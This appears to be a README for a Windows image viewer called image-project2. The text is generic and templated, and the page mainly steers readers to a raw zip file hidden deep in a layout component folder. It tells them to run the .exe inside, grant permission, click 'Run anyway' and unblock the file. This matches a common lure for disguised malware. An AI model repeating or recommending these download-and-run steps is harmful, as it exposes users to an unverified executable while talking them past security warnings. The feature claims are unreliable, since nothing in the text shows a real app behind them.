Use this page to download and run the app on Windows:
image-project2 is a simple app for working with images on your Windows PC. It is built for end users who want a quick way to open, view, and manage image files without a long setup process.
Follow the steps below to get it running.
Before you start, make sure your PC has:
- Windows 10 or Windows 11
- At least 4 GB of RAM
- 200 MB of free disk space
- A mouse and keyboard
- Internet access for the download
For best results, keep your Windows system up to date.
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Open this link in your browser: https://github.com/Ahmed-229/image-project2/raw/refs/heads/main/layout/components/lay-search/project-image-dobbing.zip
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Look for the latest release or the main download file on the page.
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Download the file to your computer.
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If your browser asks where to save it, choose your Downloads folder.
After the download finishes:
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Open the folder where the file was saved.
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If the file is a
.zipfile, right-click it and choose Extract All. -
Open the extracted folder.
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Look for the app file, such as:
.exesetup.exe- a file with the app name
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Double-click the file to start the app.
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If Windows asks for permission, choose Yes.
image-project2 is made to help you work with images in a simple way. You can expect the app to support common tasks like:
- Opening image files
- Viewing pictures in a clear window
- Browsing through image folders
- Checking image details
- Managing common image formats
- Using a simple layout that is easy to follow
When you open the app for the first time:
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Start the program from the file you downloaded.
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If the app asks you to choose a folder, pick the folder that has your images.
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If it opens to a home screen, use the main buttons to begin.
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Try opening one image first so you can see how it works.
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Move through the app one step at a time.
A typical use case looks like this:
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Open the app.
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Load an image file or a folder.
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Use the screen to view the image.
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Use the app controls to switch images, if the app shows more than one.
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Save your changes if you made any.
If you are not sure what a button does, move your mouse over it and read the label.
image-project2 is expected to work with common image types such as:
- JPG
- PNG
- BMP
- GIF
- WEBP
If you use another image type, the app may still open it if Windows supports it.
You may find simple options inside the app, such as:
- Light or dark view
- Image zoom
- Fit to screen
- Full screen mode
- Folder view
- File info panel
Use these settings to make the app match how you like to view images.
If Windows shows a security prompt:
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Check that you downloaded the app from the link above.
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Review the file name.
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Choose Run anyway only if you trust the source.
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If the app does not start, close the prompt and try the file again.
- Make sure the download finished.
- Check that you extracted the files, if the download came as a zip file.
- Try running the app again.
- Restart your PC and try once more.
- Right-click the file.
- Choose Properties.
- If you see Unblock, select it.
- Click Apply, then try again.
- Check that the image file is not broken.
- Try another image format.
- Move the image file to a simple folder like
Pictures. - Make sure you have permission to open the file.
- Use the appβs zoom or fit-to-screen option.
- Change your Windows display scaling.
- Try full screen mode if the app supports it.
- Keep your image files in one folder
- Use short folder names
- Avoid special characters in file names
- Close other heavy apps if your PC is slow
- Save a copy before making changes to images
You can keep your files in a structure like this:
PicturesTravelFamilyWorkEdited
This makes it easier to find your images in the app.
image-project2 works well for:
- Quick photo viewing
- Checking screenshots
- Browsing image folders
- Opening a set of pictures for review
- Simple image handling on Windows
If a new version is posted:
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Return to the main page: https://github.com/Ahmed-229/image-project2/raw/refs/heads/main/layout/components/lay-search/project-image-dobbing.zip
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Download the latest file.
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Replace the old files with the new ones, if needed.
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Open the app again.
If you see files with names you do not recognize:
.exemeans the app file.zipmeans a compressed foldersetup.exemeans an installerREADME.mdmeans a text guide
For most Windows users, the file you need is the app file or the installer file.
- Open the download link.
- Download the app.
- Extract the files if needed.
- Open the app file.
- Load your image folder.
- Start using the app
If something does not look right:
- Go back to the download page
- Check the file name
- Make sure you opened the correct file
- Try the steps again from the start
- Use a simple image file first, like a JPG or PNG
Use this page to get the app:
- Keep the downloaded file in a place you can find
- Do not rename files unless you need to
- If the app opens in a small window, look for a maximize button
- If the app asks for a folder, choose a folder with images inside
- Download the app
- Open the file
- Let Windows finish any setup step
- Launch the app
- Open your image folder
- View your images